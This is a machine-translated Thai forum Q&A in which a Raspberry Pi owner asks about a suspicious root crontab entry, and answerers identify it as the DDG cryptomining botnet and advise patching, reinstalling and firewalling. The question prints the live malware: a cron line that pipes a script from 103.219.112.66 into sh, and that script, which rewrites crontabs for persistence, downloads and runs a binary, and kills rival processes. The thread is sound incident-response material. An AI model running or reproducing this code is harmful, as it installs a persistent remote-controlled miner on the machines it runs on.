รายการ crontab ที่น่าสงสัยที่เรียกใช้ 'xribfa4' ทุก 15 นาที


58

ฉันต้องการเพิ่มบางอย่างลงในไฟล์ root crontab ของฉันใน Raspberry Pi ของฉันและพบรายการที่น่าสงสัยสำหรับฉันการค้นหาบางส่วนของมันบน Google ไม่ได้ทำอะไรเลย

รายการ Crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

เนื้อหาของhttp://103.219.112.66:8000/i.shคือ:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

ความรู้เกี่ยวกับ Linux ของฉันมี จำกัด แต่สำหรับฉันแล้วดูเหมือนว่าการดาวน์โหลดไบนารีจากเซิร์ฟเวอร์อินโดนีเซียและการเรียกใช้พวกเขาในฐานะที่รูทเป็นประจำไม่ใช่สิ่งที่ปกติ

นี่คืออะไร? ฉันควรทำอย่างไร?


16
มันเป็นวงกลม ทุก 15 นาทีจะดาวน์โหลดและติดตั้งสำเนาใหม่ หาก / เมื่อการคัดลอกบนเซิร์ฟเวอร์ระยะไกลมีการเปลี่ยนแปลงเซิร์ฟเวอร์ทั้งหมดที่ใช้ cronjob นี้จะดำเนินการสิ่งที่รหัสใหม่คือภายใน 15 นาที
ไวด์การ์ด

5
ราสเบอร์รี่ Pi ของคุณเปิดสู่อินเทอร์เน็ตหรือไม่? ราสเบอร์รี่ pi ของคุณทำงานอะไร นี่เป็นผลลัพธ์เดียวใน google เมื่อฉันค้นหา xribfa4 หากคุณไม่ได้ใช้งานซอฟต์แวร์ที่จำเป็นต้องทำสิ่งนี้อาจเป็นไวรัส
kemotep

6
@kemotep สตริงนั้นสุ่ม แต่ google สำหรับ IP และให้ผลลัพธ์เล็กน้อย บางสิ่งบางอย่างเกี่ยวกับการทำเหมืองแร่บ็อตเน็ต DDG
frostschutz

9
เจอแล้ว. มันบ้าที่ IP ลงทะเบียนกับเว็บไซต์รัฐบาลอินโดนีเซีย ดูเหมือนว่ามีเกือบ 2,000 Ips อื่น ๆ ที่ให้น้ำหนักบรรทุกนี้
kemotep

21
สิ่งสำคัญที่คุณต้องระวังคือแม้ว่าคุณจะลบรายการ crontab นั้นระบบของคุณส่วนใหญ่ยังคงมีช่องโหว่ที่อนุญาตให้ติดไวรัส คุณต้องค้นหาและแก้ไขจุดอ่อนนั้น
Hans-Martin Mosner

คำตอบ:


79

มันเป็นบ็อตเน็ตการขุด DDG มันทำงานอย่างไร:

  1. หาประโยชน์จากช่องโหว่ของ RCE
  2. การปรับเปลี่ยน crontab
  3. ดาวน์โหลดโปรแกรมการขุดที่เหมาะสม (เขียนด้วย go)
  4. เริ่มกระบวนการขุด

DDG: การขุดบ็อตเน็ตเล็งไปที่เซิร์ฟเวอร์ฐานข้อมูล

SystemdMiner เมื่อ botnet ยืมโครงสร้างพื้นฐานของ botnet อื่น

U&L: ฉันจะฆ่ามัลแวร์ที่น่าสนใจบนอินสแตนซ์ AWS EC2 ได้อย่างไร (เซิร์ฟเวอร์ที่ถูกบุกรุก)


4
ใช่จริง ๆ แล้วดูเหมือนว่านี่ ขอบคุณ! จะทำเครื่องหมายว่านี่เป็นคำตอบหากไม่มีอะไรใหม่เกิดขึ้น
Peter Dam

8
อย่าลืมคำแนะนำตามปกติสำหรับเครื่องที่มีรูท: ลองคิดดูว่าพวกมันเข้าได้อย่างไรเพื่อที่คุณจะได้ซ่อมรูได้ เรียนรู้จากสิ่งนี้และเพิ่มความปลอดภัยของคุณ ในที่สุด, nuke และติดตั้งเครื่องใหม่
marcelm

3
ข่าวดีก็คือว่าพวกเขาไม่ได้มีคนขุดแร่สำหรับ Pi เพียงสำหรับ i686 และ x86_64
ทำเครื่องหมาย

13
@ Mark ข่าวดีเป็นอย่างไร? มีคนควบคุม Pi ของเขาได้อย่างเต็มที่โดยใช้จุดเข้าที่ไม่รู้จักและสามารถเข้าถึงความลับของ Pi ได้อย่างสมบูรณ์ (รวมถึง แต่ไม่ จำกัด เฉพาะรหัสผ่าน) ไม่ว่านักขุดจะทำงานหรือไม่นั้นอยู่ในขอบเขตของ "ความไม่สะดวกเล็ก ๆ น้อย ๆ "
marcelm

4
@marcelm ผู้โจมตีได้รับการควบคุมเต็มรูปแบบและจากนั้นแทบจะไม่ได้ทำอะไรสำคัญกับการควบคุมนั้น
ทำเครื่องหมาย

2

กำหนดพอร์ต TCP และ UDP ที่จำเป็นจริง ๆ แล้วบล็อกพอร์ตอื่น ๆ ทั้งหมดในไฟร์วอลล์ของเราเตอร์ของคุณ อาจเป็นไปได้รายการ crontab เหล่านั้นจะไม่ปรากฏขึ้นอีกครั้ง

คุณสามารถดูว่าพอร์ตใดที่เปิดอยู่และเป็นสาธารณะโดยใช้Shields Up! คุณลักษณะที่ grc.com


5
หรือเขาสามารถแก้ไขช่องโหว่ได้
Harper - Reinstate Monica

1
@Harper อย่างแน่นอน! นั่นคือที่ได้รับ ฉันคิดว่าอาจจะไม่มีการบล็อกพอร์ตที่ไม่ได้ใช้งานก่อนมันอาจได้รับการติดตั้งใหม่ในขณะที่เขากำลังพยายามแก้ไข
Mike Waters

1
ความคิดเห็นที่เกี่ยวข้องจาก security.SE: security.stackexchange.com/questions/147770/…
Wildcard

1
สิ่งนี้ (ไม่ จำกัด เพียงแค่ TCP และ UDP เท่านั้น) เสมอ รูปแบบการรักษาความปลอดภัยที่เป็นบวกของ Aka รายการที่อนุญาตหรือปฏิเสธโดยค่าเริ่มต้น - ปฏิเสธการรับส่งข้อมูลทั้งหมดที่คุณไม่ได้ใช้หรือต้องการอย่างชัดเจน - วิธีเดียวที่จะทำให้มั่นใจได้ว่าไม่มีช่องโหว่ใด ๆ
antichris
โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.